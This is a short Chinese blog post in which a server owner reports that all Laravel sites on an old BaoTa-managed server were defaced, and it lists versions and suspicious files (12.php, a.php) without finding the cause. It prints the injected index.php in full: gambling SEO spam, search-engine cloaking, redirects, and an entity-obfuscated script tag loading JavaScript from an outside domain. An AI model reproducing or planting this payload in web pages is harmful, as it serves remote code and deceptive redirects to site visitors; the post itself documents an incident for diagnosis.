Laravel8.x或者宝塔未知漏洞 - 疏影横斜水清浅

最近一个老服务器里面的所有laravel项目全都被黑了。
特征主要是public文件夹被篡改。
index.php被修改成

<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="applicable-device" content="pc" />
<meta name="mobile-agent" content="format=xhtml;url=http://crmtest.jsxunzhi.com/m.html">
<meta name="mobile-agent" content="format=html;url=http://crmtest.jsxunzhi.com/m.html">
<link rel="alternate" media="only screen and(max-width: px)" href="http://crmtest.jsxunzhi.com/m.html">
<title>&#106;&#57;&#20061;&#28216;&#20250;&#32;&#9755;&#32;&#20061;&#28216;&#20250;&#23448;&#32593;</title>
<meta name="keywords" content="&#106;&#57;&#20061;&#28216;&#20250;&#23448;&#32593;&#32;&#9679;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#27880;&#20876;&#32;&#9679;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23448;&#32593;&#97;&#112;&#112;&#19979;&#36733;&#32;&#10084;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#30331;&#24405;&#32;&#10084;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23433;&#21331;&#97;&#112;&#112;&#19979;&#36733;&#32;&#10004;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#20837;&#21475;&#32;&#10004;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#32593;&#22336;&#32;&#9787;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23448;&#26041;&#32;&#9787;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#30452;&#25773;&#32;&#9787;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#25237;&#27880;&#32;&#9755;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#31454;&#29468;&#32;&#32;&#9755;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#24179;&#21488;&#32593;&#31449;&#9664;&#12290;"/>
<meta name="description" content="&#36275;&#29699;&#20307;&#32946;&#30495;&#20154;&#31454;&#29468;&#23448;&#32593;&#32;&#9755;&#32;&#9654;&#107;&#98;&#53;&#53;&#9679;&#99;&#99;&#9664;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23448;&#32593;&#32;&#9679;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#27880;&#20876;&#32;&#9679;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23448;&#32593;&#97;&#112;&#112;&#19979;&#36733;&#32;&#10084;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#30331;&#24405;&#32;&#10084;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23433;&#21331;&#97;&#112;&#112;&#19979;&#36733;&#32;&#10004;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#20837;&#21475;&#32;&#10004;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#32593;&#22336;&#32;&#9787;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#23448;&#26041;&#32;&#9787;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#30452;&#25773;&#32;&#9787;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#25237;&#27880;&#32;&#9755;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#31454;&#29468;&#32;&#32;&#9755;&#32;&#106;&#57;&#20061;&#28216;&#20250;&#24179;&#21488;&#32593;&#31449;&#9664;&#12290;&#10085;&#106;&#57;&#20061;&#28216;&#20250;&#20026;&#24744;&#25552;&#20379;&#20307;&#32946;&#26368;&#24555;&#36895;&#26368;&#20840;&#38754;&#26368;&#19987;&#19994;&#30340;&#20307;&#32946;&#26032;&#38395;&#21644;&#36187;&#20107;&#25253;&#36947;&#65281;&#10086;&#32;&#9754;&#9754;&#9754;&#9754;&#9754;&#9754;&#9754;&#20185;&#22899;&#19979;&#20961;&#9754;"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -){document.title ="恭喜，站点创建成功！"}</script>
<script src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#108;&#105;&#97;&#110;&#103;&#103;&#101;&#120;&#105;&#97;&#111;&#109;&#117;&#98;&#105;&#97;&#111;&#46;&#118;&#105;&#112;&#47;&#98;&#98;&#46;&#106;&#115;"></script>
<style>
.container {
width: 60%;
margin: 10% auto 0;
background-color: #f0f0f0;
padding: 2% 5%;
border-radius: 10px
}

ul {
padding-left: 20px;
}

ul li {
line-height: 2.3
}

a {
color: #20a53a
}
</style>
</head>
<body>
<div class="container">
<h1>恭喜, 站点创建成功！</h1>
<h3>这是默认index.html，本页面由系统自动生成</h3>
<ul>
<li>本页面在FTP根目录下的index.html</li>
<li>您可以修改、删除或覆盖本页面</li>
<li>FTP相关信息，请到“面板系统后台 > FTP” 查看</li>
<li>更多功能了解，请查看<a href="https://www.bt.cn" target="_blank">宝塔官网(www.bt.cn)</a></li>
</ul>
</div>
</body>
</html>

laravel framework 版本v8.38.0
宝塔版本7.9.9

nginx访问日志，特征文件有
12.php
a.php之类

未找到原因

赞助一杯咖啡☕️

本文由 widdy 创作，采用知识共享署名4.0 国际许可协议进行许可
本站文章除注明转载/出处外，均为本站原创或翻译，转载前请务必署名
最后编辑时间为: Jun 20, 2023 at 01:47 pm